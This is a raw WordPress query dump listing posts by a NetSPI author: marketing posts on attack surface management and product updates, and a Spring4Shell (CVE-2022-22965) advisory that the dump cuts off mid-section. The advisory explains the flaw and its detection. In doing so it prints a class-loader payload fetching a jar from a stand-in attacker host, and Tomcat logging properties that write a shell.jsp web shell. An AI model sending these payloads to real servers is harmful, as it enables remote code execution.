Jake Reynolds

Jake Reynolds is an R&D expert focusing on emerging penetration testing technology. Formerly, as NetSPI's Head of Emerging Product, Jake was responsible for the company's emerging product strategy and had spent time as a Principal Security Consultant helping lead internal R&D and application penetration testing services at NetSPI. He graduated with a Bachelors Degree in Computer Science from the University of Minnesota, Twin Cities with a focus on enterprise web development.
More by Jake Reynolds
WP_Query Object
(
    [query] => Array
        (
            [post_type] => Array
                (
                    [0] => post
                    [1] => webinars
                )

            [posts_per_page] => -1
            [post_status] => publish
            [meta_query] => Array
                (
                    [relation] => OR
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "31"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "31"
                            [compare] => LIKE
                        )

                )

        )

    [query_vars] => Array
        (
            [post_type] => Array
                (
                    [0] => post
                    [1] => webinars
                )

            [posts_per_page] => -1
            [post_status] => publish
            [meta_query] => Array
                (
                    [relation] => OR
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "31"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "31"
                            [compare] => LIKE
                        )

                )

            [error] => 
            [m] => 
            [p] => 0
            [post_parent] => 
            [subpost] => 
            [subpost_id] => 
            [attachment] => 
            [attachment_id] => 0
            [name] => 
            [pagename] => 
            [page_id] => 0
            [second] => 
            [minute] => 
            [hour] => 
            [day] => 0
            [monthnum] => 0
            [year] => 0
            [w] => 0
            [category_name] => 
            [tag] => 
            [cat] => 
            [tag_id] => 
            [author] => 
            [author_name] => 
            [feed] => 
            [tb] => 
            [paged] => 0
            [meta_key] => 
            [meta_value] => 
            [preview] => 
            [s] => 
            [sentence] => 
            [title] => 
            [fields] => 
            [menu_order] => 
            [embed] => 
            [category__in] => Array
                (
                )

            [category__not_in] => Array
                (
                )

            [category__and] => Array
                (
                )

            [post__in] => Array
                (
                )

            [post__not_in] => Array
                (
                )

            [post_name__in] => Array
                (
                )

            [tag__in] => Array
                (
                )

            [tag__not_in] => Array
                (
                )

            [tag__and] => Array
                (
                )

            [tag_slug__in] => Array
                (
                )

            [tag_slug__and] => Array
                (
                )

            [post_parent__in] => Array
                (
                )

            [post_parent__not_in] => Array
                (
                )

            [author__in] => Array
                (
                )

            [author__not_in] => Array
                (
                )

            [search_columns] => Array
                (
                )

            [ignore_sticky_posts] => 
            [suppress_filters] => 
            [cache_results] => 1
            [update_post_term_cache] => 1
            [update_menu_item_cache] => 
            [lazy_load_term_meta] => 1
            [update_post_meta_cache] => 1
            [nopaging] => 1
            [comments_per_page] => 50
            [no_found_rows] => 
            [order] => DESC
        )

    [tax_query] => WP_Tax_Query Object
        (
            [queries] => Array
                (
                )

            [relation] => AND
            [table_aliases:protected] => Array
                (
                )

            [queried_terms] => Array
                (
                )

            [primary_table] => wp_posts
            [primary_id_column] => ID
        )

    [meta_query] => WP_Meta_Query Object
        (
            [queries] => Array
                (
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "31"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "31"
                            [compare] => LIKE
                        )

                    [relation] => OR
                )

            [relation] => OR
            [meta_table] => wp_postmeta
            [meta_id_column] => post_id
            [primary_table] => wp_posts
            [primary_id_column] => ID
            [table_aliases:protected] => Array
                (
                    [0] => wp_postmeta
                )

            [clauses:protected] => Array
                (
                    [wp_postmeta] => Array
                        (
                            [key] => new_authors
                            [value] => "31"
                            [compare] => LIKE
                            [compare_key] => =
                            [alias] => wp_postmeta
                            [cast] => CHAR
                        )

                    [wp_postmeta-1] => Array
                        (
                            [key] => new_presenters
                            [value] => "31"
                            [compare] => LIKE
                            [compare_key] => =
                            [alias] => wp_postmeta
                            [cast] => CHAR
                        )

                )

            [has_or_relation:protected] => 1
        )

    [date_query] => 
    [request] => 
					SELECT   wp_posts.ID
					FROM wp_posts  INNER JOIN wp_postmeta ON ( wp_posts.ID = wp_postmeta.post_id )
					WHERE 1=1  AND ( 
  ( wp_postmeta.meta_key = 'new_authors' AND wp_postmeta.meta_value LIKE '{aa18533b2042d6390d59c5949fe5b5306d809881b942b5b7416652ad020365ba}\"31\"{aa18533b2042d6390d59c5949fe5b5306d809881b942b5b7416652ad020365ba}' ) 
  OR 
  ( wp_postmeta.meta_key = 'new_presenters' AND wp_postmeta.meta_value LIKE '{aa18533b2042d6390d59c5949fe5b5306d809881b942b5b7416652ad020365ba}\"31\"{aa18533b2042d6390d59c5949fe5b5306d809881b942b5b7416652ad020365ba}' )
) AND wp_posts.post_type IN ('post', 'webinars') AND ((wp_posts.post_status = 'publish'))
					GROUP BY wp_posts.ID
					ORDER BY wp_posts.post_date DESC
					
				
    [posts] => Array
        (
            [0] => WP_Post Object
                (
                    [ID] => 30089
                    [post_author] => 31
                    [post_date] => 2023-05-02 09:00:00
                    [post_date_gmt] => 2023-05-02 14:00:00
                    [post_content] => 

Unmanaged attack surfaces are increasingly becoming a pathway for threat actors to gain access to systems, making effective attack surface management (ASM) more critical than ever before.  

According to research from Enterprise Strategy Group (ESG), more than half of businesses surveyed (52 percent) say that security operations are more difficult today than they were two years ago. The top reasons respondents indicated for increased challenges include an evolving threat landscape and a changing attack surface.  

Given the sophistication of threats today, a comprehensive attack surface management strategy can help proactively identify gaps and vulnerabilities while strengthening security controls.  

Let’s start by breaking down what an attack surface is. 

What is an Attack Surface? 

An attack surface is an accumulation of all the different points of entry on the internet that a threat actor could exploit to access your external-facing assets, such as hardware, software, and cloud assets. 

An enterprise attack surface may include digital attack surfaces, such as:  

  1. Application attack surface 
  2. Internet of Things (IoT) attack surface 
  3. Kubernetes attack surface 
  4. Network attack surface 
  5. Software attack surface 
  6. Cloud attack surface 

Other types of enterprise attack surfaces include human attack surfaces and physical attack surfaces. 
 
In our connected environment, a company's total number of attack surfaces and overall digital footprint continues to expand, which puts external-facing assets at risk for exposures and vulnerabilities. 
 
Cloud storage adoption and hybrid work environments that rely on cloud solutions are some of the top reasons for expanded attack surfaces. Another factor is that an uptick in mergers and acquisitions can lead to acquiring assets that may be unknown, resulting in unmanaged attack surfaces. 

How Are Attack Vectors and Attack Surfaces Related?  

Attack vectors and attack surfaces are related because attack surfaces comprise all of the attack vectors, which include any method a threat actor can use to gain unauthorized access to an environment. Examples of attack vectors include ransomware, malware, phishing, internal threats, misconfiguration, and compromised credentials, among many others – vectors can also exist as a combination of these examples listed.  

As attack vectors become more complex, security teams need to identify and implement new, more effective solutions to secure attack surfaces and stay ahead of sophisticated threat actors.  

Monitoring and protecting against evolving attack vectors becomes more critical as an attack surface grows. For the purpose of this article, we’re focusing on how to effectively manage external attack surfaces since this is a common challenge many businesses face. The external attack surface remains a priority for remediation because it presents a higher risk due to its exposure to the internet. 

What is Attack Surface Management? 

Many businesses struggle to keep up with their ever-evolving attack surface. The good news is that ASM vendors equip internal teams with data-driven decisions to methodically tackle remediation efforts. 
 
Attack surface management provides continuous observability and risk assessment of your organization’s entire attack surface. When coupled effectively with continuous penetration testing, attack surface management helps companies improve their attack surface visibility, asset inventory, and understanding of their critical exposures. 

More specifically, external attack surface management (EASM) is the process of identifying and managing your organization’s attack surface, specifically from the outside-in view. The goal is to identify external assets that attackers could potentially leverage and discover exposures before malicious actors do.

Attack Surface Management Use-Cases 

Through the attack surface, adversaries can exploit exposures to identify vulnerabilities that will give them access to your organization. If threat actors are successful, then outcomes will vary depending on the attack surface and other factors—but they will undoubtedly be negative.  

Common outcomes include: 

  1. Deployment of malware on your network for the purposes of ransomware, or worse, killware. 
  2. Extraction of employee data such as social security numbers, healthcare data, and personal contact information. 

Effective asset management and change control processes are challenging, and even the most well-intentioned companies often see this as an area for improvement. The right attack surface management solution should include a combination of three core pillars: human expertise, continuous penetration testing, and prioritized exposures based on risk. 
 
Common reasons to invest in attack surface management include: 

  1. Continuous observability and risk management 
  2. Identification of external gaps in visibility 
  3. Discovery of known and unknown assets and Shadow IT 
  4. Risk-based vulnerability prioritization 
  5. Assessment of M&A and subsidiary risk 

Manage Growing Attack Surfaces with NetSPI 

NetSPI’s Attack Surface Management (ASM) platform helps security teams quickly discover and address vulnerabilities across growing attack surfaces before adversaries do.   
 
Four of the top five leading global cloud providers trust NetSPI for continuous threat and exposure management, leveraging our team, technology, and comprehensive methodology to detect known, unknown, and potentially vulnerable public-facing assets. 

Learn more about NetSPI’s attack surface management solutions or request a demo. Also check out our free Attack Surface Management Tool to search more than 800 million public records for potential attack surface exposures. 

[post_title] => Protect Your Growing Attack Surface in a Modern Environment [post_excerpt] => Attack surface management is critical to protecting an organization’s growing digital footprint in today’s connected environment. Learn how. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => protect-growing-attack-surface [to_ping] => [pinged] => [post_modified] => 2023-05-01 16:54:39 [post_modified_gmt] => 2023-05-01 21:54:39 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=30089 [menu_order] => 116 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [1] => WP_Post Object ( [ID] => 29904 [post_author] => 53 [post_date] => 2023-03-23 11:14:37 [post_date_gmt] => 2023-03-23 16:14:37 [post_content] =>
Watch Now

NetSPI's Head of Emerging Technology, Jake Reynolds, teamed up with Hacker Valley Studios for a sponsored episode on Emerging Cybersecurity Technologies.

Hacker Valley Studios chat with Jake about:

0:00 - Welcome Jake Reynolds
2:30 - What is a full stack engineer?
4:39 - Having a large cybersecurity attack surface
6:00 - Attack surface trends
8:29 - Do cloud engineers need to know networking?
10:12 - Levels of abstraction in the cloud and making sense of it
12:13 - Does bug bounty help you with your job?
15:49 - Will we see network exploits again?
16:53 - Special question from NetSPI
17:31 - Which emerging technologies are you watching?
20:30 - Have we really reached the max of ChatGPT hypes?
24:33 - What AI/ML capability does cybersecurity need?
27:28 - How do we stack the deck against the hackers?

[wonderplugin_video iframe="https://youtu.be/r1qRuTMhi64" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => Emerging Cybersecurity Technologies with Jake Reynolds [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => hacker-valley-studio-attack-surface-management [to_ping] => [pinged] => [post_modified] => 2023-07-14 08:53:22 [post_modified_gmt] => 2023-07-14 13:53:22 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=29904 [menu_order] => 36 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [2] => WP_Post Object ( [ID] => 29338 [post_author] => 17 [post_date] => 2023-02-07 09:00:00 [post_date_gmt] => 2023-02-07 15:00:00 [post_content] =>

NetSPI prides itself on maintaining a leadership position in the global offensive security space by listening to client feedback, analyzing industry trends, and investing in breakthrough technology developments.

Over the last few months, our development teams have been busy, and are excited to introduce a variety of new features and capabilities across our Breach and Attack Simulation, Attack Surface Management, and Penetration Testing as a Service (PTaaS) solutions to help organizations improve security posture, streamline remediation, and protect themselves from adversaries.

Of the releases across our solutions portfolio, Breach and Attack Simulation (BAS) received the most significant updates, so let's start there.

Breach and Attack Simulation (BAS) 

NetSPI BAS data shows that only 20% of common attack behaviors are detected by traditional EDR, SIEM, and MSSP solutions. Although most companies spend thousands, even millions, of dollars on detective controls, very few test to validate if they work and provide the value they claim to.

NetSPI’s Breach and Attack Simulation is designed to evaluate detective control effectiveness and educate security operations teams around common TTPs across the cyber kill chain. After many invaluable feedback sessions with NetSPI clients and hours of market research, we are excited to unveil major updates to our Breach and Attack Simulation platform, dialing in on three core dashboards: the Workspace, Timeline, and Heat Map dashboards.

Workspace 

The Workspace is where red teams, purple teams, security engineers, and analysts will spend a majority of their time. Here, they can build, configure and run customized procedures to test their detective controls. Key features within the Workspace include:

  • Utilize preconfigured procedures – or customize your own – to put detective controls to the test 
  • Visualize security posture and identify gaps using detailed summary charts that update in real time. These can be saved and downloaded to easily share with SOC teams and executive leadership to highlight gaps and justify budget for new staff and technology. 
  • While in the Workspace, users can also learn about each detection phase (logged, detected, alerted, responded, and prevented) for common TTPs within the Mitre ATT&CK framework – down to the individual procedure level.  
  • The Activity Log feature allows security teams to ditch the spreadsheets, wiki pages, and notepads they currently use to track information around their detective control capabilities and centralize this information from a summary viewpoint down to the findings level, allowing streamlined communication and remediation. It will also automatically log play execution and visibility state changes. 
  • Tags allow security teams to see the number of malware and threat actors that use the specific technique, helping prioritize resources and remediation efforts. Tags can also be leveraged to generate custom playbooks that include procedures used by unique threat actors, allowing security teams to measure their resiliency to specific threats quickly and easily. 
  • Export test results in JSON or CSV, allowing the SOC team to plug information into existing business processes and products, or develop customized metrics. 

In summary, the Workspace is designed to educate and enable security teams to understand common attack procedures, how to detect them, and provide resources where they can learn more. 

Timeline 

While the Workspace shows a lot of great information, it focuses on a single point in time. The Timeline dashboard, however, allows you to measure detective controls over time.

This allows security teams to prove the value of investments in people, processes or technology. The Timeline Dashboard will also show where things have improved, stayed the same, or gotten worse at any stage of the Mitre ATT&CK kill chain.

While many competitive BAS offerings will show what is being Alerted on, a unique differentiator for NetSPI is the ability to filter results and show changes in what is logged, detected, alerted, responded, and prevented. These changes can be shown as a percentage (i.e. Logging improved 5 percent) or a count (i.e. Logging improved within two different procedures). Similarly to the Workspace, these charts can be downloaded and easily inserted into presentations, emails, or other reports as needed.

For additional information on how NetSPI defines logging, detection, alerting, response, and prevention, read How to Paint a Comprehensive Threat Detection Landscape

Heat Map

Security teams often refer to the Mitre ATT&CK framework, which shows the phases, tactics, or techniques of common TTPs and procedures seen in the wild. We know that many teams prefer seeing results in this framework, and as such, have built it into our Breach and Attack Simulation platform. BAS delivers a familiar way to interact with the data, while still connecting to the workspace created for detection engineers and other security team members.

As mentioned in the Timeline dashboard, a key differentiator is that we show the different visibility levels (logged, detected, alerted, responded, and prevented) within the Mitre ATT&CK framework coverage within each phase of the cyber kill chain and even down to each specific technique.

Here, we also have the ability to dig in and show all of the procedures that are supported within each technique category. These are then cross-linked back to the Workspace, to streamline remediation and re-testing of specific coverage gaps.

This is a quick summary of a few new features and benefits included in our updated Breach and Attack Simulation solution. If you would like to learn more, we encourage you to read our release notes, or contact us for a demo.

Attack Surface Management (ASM) 

Attack Surface Management continues to be a major focus and growing technology within the cybersecurity industry. NetSPI’s most recent ASM updates focus on organizing, filtering, and expanding on information that was previously included, but will now be even easier to locate and pull actionable information from.  

Three key new feature highlights from last quarter include Vulnerability Triggers, Certificate Transparency Logs, and the Subdomain Facet within our domain explore page.

Vulnerability Triggers

First off, what is a vulnerability? Vulnerabilities consist of any exploits of significant risk identified on your attack surface, which are found by combining both assets and exposures. Although a specific asset or exposure might not be very impactful, when combined into a series of steps it can result in a much greater risk.

With the recent introduction of Vulnerability Triggers, admins can now query assets and exposures for specific criteria based on preconfigured or customized search results, and alert on the ones that are the most concerning to you or your company. These Vulnerability Triggers can now be customized to search for criteria related to Domains, IPs, or Ports.

Long story short, Vulnerability triggers allow your company to not only search for common assets, exploits and vulnerabilities, but also key areas of concern for your executive team, industry, organization, or project.

Certificate Transparency Logs & Subdomain Facet

The next two new features are focused on root domain and subdomain discovery.

NetSPI’s ASM has searched root domains and subdomains since its creation, however we are proud to officially introduce Certificate Transparency Logs! We now ingest certificate transparency logs from public data sources, allowing us to significantly increase domain discovery.

We are also excited to announce the release of our Subdomain Facet within our domain explore page. It is common for companies to have tens, or even hundreds, of subdomains on their attack surface, however with the Subdomain Facet within our domains explore page, you will now be able to filter the common subdomains on your attack surface.

A great use case example of this is to discover development subdomains (dev.netspi.com, stage.netspi.com, or prod.netspi.com, etc.) where sensitive projects or intellectual property might be located, and unintentionally exposed externally.

Another common use case for these types of features could be to detect sub domains that have been hijacked by malicious adversaries in an attempt to steal sensitive customer or employee information.

This is a quick summary of a few new features and benefits included in our Attack Surface Management offering, however if you would like to learn more, we encourage you to read our release notes, or contact us for a demo.

Penetration Testing as a Service (Resolve™) 

NetSPI’s Resolve, our penetration testing as a service (PTaaS) platform, has been an industry leader for years, allowing users to visualize their test results and streamline remediation by up to 40%. This product would not be able to remain a leader without continued updates from our product development teams.

Recently, we have been focused on delivering updates to enhance the user experience and make data within the platform to be more accessible and easily leveraged within other security team processes and platforms.

AND/OR Logic

Previously, when users created filters in the grid, AND Logic, as well as OR Logic could be used on filtered search results. We are excited to introduce AND/OR Logic to filters, allowing users to combine both AND Logic and OR Logic to deliver more detailed results to their security teams or business leaders.

Automated Instance State Workflow

Finally, we have introduced automated instance state workflows to include bulk edits. Previously, this was only applicable while updating individual instance states. This change improves efficiencies within the Resolve platform for entire vulnerability management teams.

This is a quick summary of a few new features and benefits included in our PTaaS solution, however if you would like to learn more, we encourage you to read our release notes, or contact us for a demo.

This blog post is a part of our offensive security solutions update series. Stay tuned for additional innovations within Resolve (PTaaS), ASM (Attack Surface Management), and BAS (Breach and Attack Simulation).


Read past solutions update blogs: 

[post_title] => NetSPI Offensive Security Solutions Updates: Q1 2023 [post_excerpt] => Learn how NetSPI’s updates to Penetration Testing as a Service (PTaaS), Attack Surface Management, and Breach and Attack Simulation can help you better secure your environment. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => offensive-security-updates-q1-2023 [to_ping] => [pinged] => [post_modified] => 2023-05-18 12:55:59 [post_modified_gmt] => 2023-05-18 17:55:59 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=29338 [menu_order] => 147 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [3] => WP_Post Object ( [ID] => 28733 [post_author] => 31 [post_date] => 2022-10-25 09:00:00 [post_date_gmt] => 2022-10-25 14:00:00 [post_content] =>

Hackers are highly motivated and incentivized to find new ways to gain access to your systems, expose your information, or even target your customers. To deliver the highest level of security and maintain a leadership position in the global offensive security space, NetSPI continues to invest in new technology, updated service capabilities, and the highest-quality teams. 

"On average, attack surface management tools initially discover 30% more cloud assets than security and IT teams even know they have," according to Forrester’s Find And Cover Your Assets With Attack Surface Management report. Although some tools discovered several hundred percent more assets than they originally knew about. 

Top use cases for attack surface management technologies are asset discovery and inventory, supply chain and third-party risk management, M&A due diligence, and compliance management. NetSPI’s Attack Surface Management (ASM) development team recognized these common use cases and saw the need to categorize and sort information faster, easier, and in a more intelligent way.  

The IT and SOC teams we work with are not simply looking for more data – they are looking for more meaningful and actionable data, and our recent developments have been targeted towards that.  

As a result, we are proud to introduce two new features into NetSPI’s ASM solution: the Portfolio Dashboard and Perceptual Hashing.

The Portfolio Dashboard

The ASM Portfolio Dashboard allows your company a global risk view of your attack surface, specifically showing your corporate network along with all portfolio or client networks.

The Portfolio Dashboard is, simply put, a dashboard. This dashboard allows your company a global risk view of your attack surface, specifically showing your corporate network along with all portfolio or client networks. We’ve seen the most benefit from this feature in companies going through M&A processes, private equity firms, cyber insurance companies, parent companies, and conglomerates, along with many others. 

Organizations using ASM can now search and filter for a specific threat or technology within their entire portfolio. This enables them to clearly display the specific assets that have potential vulnerabilities and provide actionable information in seconds. 

A well-known example where NetSPI’s ASM Portfolio Dashboard would have proven valuable is Log4Shell. Log4Shell is a remote code execution vulnerability in Apache Log4j that allowed attackers to place malware on a targeted system, leading to the potential of a completely compromised network, theft of sensitive information, and more. 

Not good! 

In this example, non-portfolio companies were struggling to identify all affected assets within their network. Portfolio companies and cyber-insurance companies needed to not only identify assets within their own network, but they also needed to identify affected assets in their clients’ networks – searching every known potentially vulnerable asset to better understand their risk, while still missing every unknown asset. 

Again, not good! 

If the Log4j crisis happened today however, companies could leverage NetPI’s ASM portfolio dashboard to quickly and easily search for any affected device across their global attack surface. The potentially vulnerable assets would be displayed in a simple dashboard (as seen in the screenshot above) and allow IT and security teams to react accordingly, letting them efficiently target the most vulnerable areas, potentially saving the company and their customers from catastrophic damage.  

This is just one example of how the portfolio dashboard can benefit companies today. Although many organizations have remediated Log4Shell today, this feature can help in much the same way with other threats or technologies that may arise tomorrow, next week, or in the future. 

Perceptual Hashing

Perceptual Hashing analyzes these screenshots and categorizes them based on similar looks, styles, layouts, and images.

NetSPI’s current ASM offering routinely takes screenshots of all websites on your global attack surface. And we’re excited to share that the platform now includes Perceptual Hashing.  

Perceptual Hashing, sometimes referred to as Perceptual Image Hashing or Perceptual Sorting, analyzes these screenshots and categorizes them based on similar looks, styles, layouts, and images. These groups of screenshots are then reviewed by NetSPI’s ASM Operations Team to identify trends in your network or find outliers of websites running on your perimeter, and then notify your team. 

There are other types of hashing, such as average hashing, cryptographic hashing, geometric hashing, etc., however perceptual hashing is the most effective in cybersecurity because it is designed to recognize and group similar items even if minor modifications are made to the images such as compression, brightness, etc. As a result, images that are similar will be grouped together, however outliers will be detected and grouped separately.  

The intention is that if there is a vulnerability found on one of your public facing websites, Perceptual Hashing will allow you to search for similar webpages so you can review and take action. With NetSPI’s ASM continuous penetration testing capabilities and real-time reporting, teams will know if there are any publicly exposed management interfaces almost instantly and can respond accordingly. 

One of NetSPI’s ASM clients, a Fortune 500 technology company, recently used Perceptual Hashing to efficiently identify a vulnerability across various servers. The ASM Operations Team discovered a publicly exposed management interface in a proprietary web application during a routine scan, which left them vulnerable to external unauthenticated users accessing administrative functionality. The ASM team was able to take this finding and search the entirety of their other websites with the equivalent perceptual hash, identifying multiple other vulnerable servers. Once all were searched and the vulnerabilities were discovered, the team was able to report back to the company and guide them to remediate accordingly. 

Other cases where NetSPI’s Perceptual Hashing feature can be used are: 

  • Servers using specific landing pages or technologies 
  • Publicly exposed interface management 
  • Digital rights management 
  • Data deduplication 
  • Image searching 

These are just two examples of recent innovations added to NetSPI’s Attack Surface Management solution. Although Perceptual Hashing is my current favorite feature, there are many innovations in the works right now to continue delivering the highest quality security for customers with our technology driven, human delivered methodology. 

Other noteworthy updates to our ASM solution include: 

  • New intelligent search help – when users click on the search inputs, they are presented with helpful suggestions to deliver the best results. 
  • Users in the Domain, IP Address, and Port table views can now copy selected assets and port URLs to the clipboard. 
  • Users can add an attribution statement when adding assets. 
  • Domain and IP address exports have been updated to include ports and associated assets. 
  • Domains, Ports, and IP Addresses now have all associated screenshots available to view. 
  • When viewing the full details page for a Domain, you can now use the “Generate Report” button to get a summary report specifically for that domain. 
  • The main dashboard now shows you trends of all vulnerabilities on your attack surface over time, separated by severity. 
  • On the ASNs page, the 'Scan for ASNs' button now validates and updates existing ASN associations in addition to inserting newly identified ASNs. 
  • The Port Gallery has been converted to an Explore page with left-hand facet searches. 
  • SAML SSO now supports users from multiple domains. 
  • Ability to automatically transform invalid CIDR ranges when adding assets. 
  • New port intelligence, including status code, content type, content length, site title, JARM, and HTTP reachability. 

Additional updates can be found on the Attack Surface Management changelog: https://asm.netspi.com/guide/changelog/. 

To learn more about NetSPI’s Attack Surface Management, contact your rep or connect with us here

This blog post is a part of our offensive security product update series. Stay tuned for additional innovations within Resolve (PTaaS), ASM (Attack Surface Management), and AttackSim (Breach and Attack Simulation).

[post_title] => NetSPI Attack Surface Management Updates: Portfolio Dashboard & Perceptual Hashing [post_excerpt] => Learn how NetSPI’s new ASM features, Portfolio Dashboard and Perceptual Hashing, can help organizations better manage and secure their evolving attack surface. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => asm-portfolio-dashboard-perceptual-hashing [to_ping] => [pinged] => [post_modified] => 2023-05-18 13:01:10 [post_modified_gmt] => 2023-05-18 18:01:10 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28733 [menu_order] => 185 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [4] => WP_Post Object ( [ID] => 27620 [post_author] => 77 [post_date] => 2022-04-06 15:00:00 [post_date_gmt] => 2022-04-06 20:00:00 [post_content] =>

On March 29, 2022, organizations experienced widespread concern when the Spring4Shell vulnerability was disclosed. Since then, we’ve noticed a sense of confusion around the remote code execution (RCE) vulnerability and its impact.  

Before we dive into the vulnerability details, here are four facts to help you understand what Spring4Shell really is – and its intricacies: 

  • The vulnerability was leaked ahead of CVE publication and ahead of the emergency releases planned by the Spring Framework team. This small window gave time for individuals to speculate on total impact and spread unfounded claims.
  • The name “Spring4Shell” was sometimes used for both this issue (CVE-2022-22965) and another Spring vulnerability (CVE-2022-22963) related to Cloud Function Expressions. However, these vulnerabilities are unrelated and should be handled independently.
  • Spring4Shell is actually a bypass for a fixed issue from 12 years ago, CVE-2010-1622, which involves the same abuse of nested properties to access class loader objects. The issue itself stems from insecure coding patterns that Spring recommends avoiding. In addition, it depends on specific deployment and environmental requirements. All of this makes it difficult to identify affected applications. We’ll cover detection in detail later in this blog.
  • Impact is still to be determined, as there are conflicting claims about Spring4Shell being actively exploited. Initial reports compare it to Log4Shell, which has been leveraged in many known attacks since disclosure. But after analysis of the initial report, it is still unclear how many applications are truly vulnerable to attacks.  

In summary, this vulnerability was prematurely leaked shortly after the publication of another unrelated Spring issue. The name “Spring4Shell” was quickly abused in reference to the recent “Log4Shell” issue, despite the vulnerabilities having significantly different impact. Misinformation about the vulnerability quickly circulated while the Spring team was still preparing its patches and technical guidance. 

As we monitor the situation closely, we will update this blog with new details. Continue reading to learn what we know so far and how we’ve optimized NetSPI’s Attack Surface Management platform to help organizations identify vulnerable instances of Spring Framework. 

Current Status: On March 31, 2022, a patch was released by the Spring team for CVE-2022-22965

What is Spring4Shell? 

Spring4Shell is a vulnerability found in the Java Spring Core framework that could allow for remote code execution (RCE) on web servers around the world. As noted above, this issue is almost identical to an older vulnerability from 2010 and if exploited, could allow attackers to write files to the underlying web server host, modify system configurations, or upload web shells for code execution.  

The popularity of VMWare-owned Spring and the prematurely released proof of concept (PoC) generated lofty expectations of abuse. However, nuances in the technical details have revealed exploitation is slightly more than trivial and dependent on specific coding practices and deployment environments. 

Follow along with us as we breakdown the technical details of the issue, who exactly is affected, and how to handle the next round of vulnerability panic. 

Technical Overview 

Underneath, the vulnerability depends on the unsecured use of basic Java objects (POJOs) as parameters in request mappings. The Spring MVC supports this concept to simplify the mapping of HTML form bodies to objects. Here is an example of this feature in use: 

public class User { 
    public String name; 
 
 
    public String getName(); 
    public void setName(String name); 
} 
 
 
@RequestMapping("/adduser") 
public User addUser(User user) { 
    return user; 
} 

This code is convenient, but technically goes against guidance from Spring by not configuring allowFields on the DataBinder. It’s the novelty of this specific pattern that casts uncertainty on how many applications might be affected. We can leverage this endpoint to create a new User object with the following request. 

POST /adduser HTTP/1.1 
 
name=Nick 

Upon receiving the request, Spring (specifically the Beans subsystem) will inspect the User class and try to assign properties to a new object based on the parameters provided. If a more complicated object was supplied, Spring would also allow us to supply nested properties such as this: 

POST /adduser HTTP/1.1 
 
address.city.name=NewYork 

Which, through reflection, would equate the following Java calls: 

UserObj.getAddress().getCity().setName("NewYork"); 

It’s here that we arrive at the primary concern. In the examples above, we’re assigning expected properties on our User object, but there are many other “hidden” properties that could be abused to access core internal classes in the Java framework. This was originally disclosed in CVE-2010-1622, where the payload accessed the URLs on a nested Class Loader object: 

class.classLoader.URLs[0]=jar:https://attacker/evil.jar!/ 
 
UserObj.getClass().getClassLoader().getURLs()[0] = 
"jar:https://attacker/evil.jar!/"; 

While the original fix blocked access to the classLoader property, this issue resurfaced in JDK 9 where you could now access the module property on a class, and leverage the classLoader from that instead: 

class.module.classLoader... 
  
UserObj.getClass().getModule().getClassLoader()…;

In addition to restoring classLoader access, the leaked Spring4Shell proof of concept (PoC) took a different approach to achieving code execution. Rather than manipulating class loader URLs (which have since been more secured), the author used property walking to access the Tomcat logging class and reconfigure its properties to achieve an arbitrary file write. In the example below shell.jsp could be written to any filesystem path with the supplied contents from the pattern property. 

class.module.classLoader.resources.context.parent.pipeline.first.
prefix=shell 
class.module.classLoader.resources.context.parent.pipeline.first.
suffix=.jsp 
class.module.classLoader.resources.context.parent.pipeline.first.
pattern=[Content] 
class.module.classLoader.resources.context.parent.pipeline.first.
directory=[Path] 

The new fix for this vulnerability more thoroughly inspects properties to block access to the classLoader and protectionDomain irregardless of where they fall in the object graph. However, even Spring notes that this doesn’t prevent the abuse of unrestricted parameter bindings in more specific cases. Developers should understand the implications of this feature and follow the hardening guidance from Spring whenever possible. 

Am I Affected by Spring4Shell? 

Exploitation of the vulnerability depends on specific coding patterns and deployment environments, both of which make the issue difficult to identify with simple scanners. Any individual web endpoint (authenticated or not) in an application could be affected. As a first step, we encourage you to connect directly with your development teams to assess application dependency trees.  

According to the Spring team’s report, those who meet the following criteria are affected by the Spring4Shell vulnerability.  

  • Java Development Kit (JDK) 9 or higher 
  • Apache Tomcat as the Servlet container 
  • Packaged as a traditional WAR (in contrast to a Spring Boot executable jar) 
  • Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions 
  • spring-webmvc or spring-webflux dependency 

Spring4Shell Detection 

For better or worse this vulnerability is difficult to detect remotely from a blind context. As mentioned, any endpoint in an application might be affected and requirements like authentication might result in many false negatives. Here is a breakdown of our recommended detection strategies to follow: 

  • Contact internal development teams to identify custom applications that leverage the Spring framework. Vulnerable versions are noted above and there are multiple options for patching and mitigations. There are also local scanners available to help search for affected JAR files on the system.
  • Monitor vendor sites for the references to CVE-2022-22965/Spring4Shell to identify and patch 3rd party applications.
  • External web requests can be used as a primitive detection for this vulnerability. When certain invalid data is provided for property resolution, the server might often return a different status code (400/500). Scanners can perform multiple requests against web endpoints to identify variable status codes based on input. This is a good indication that access to nested classLoader objects is allowed.  

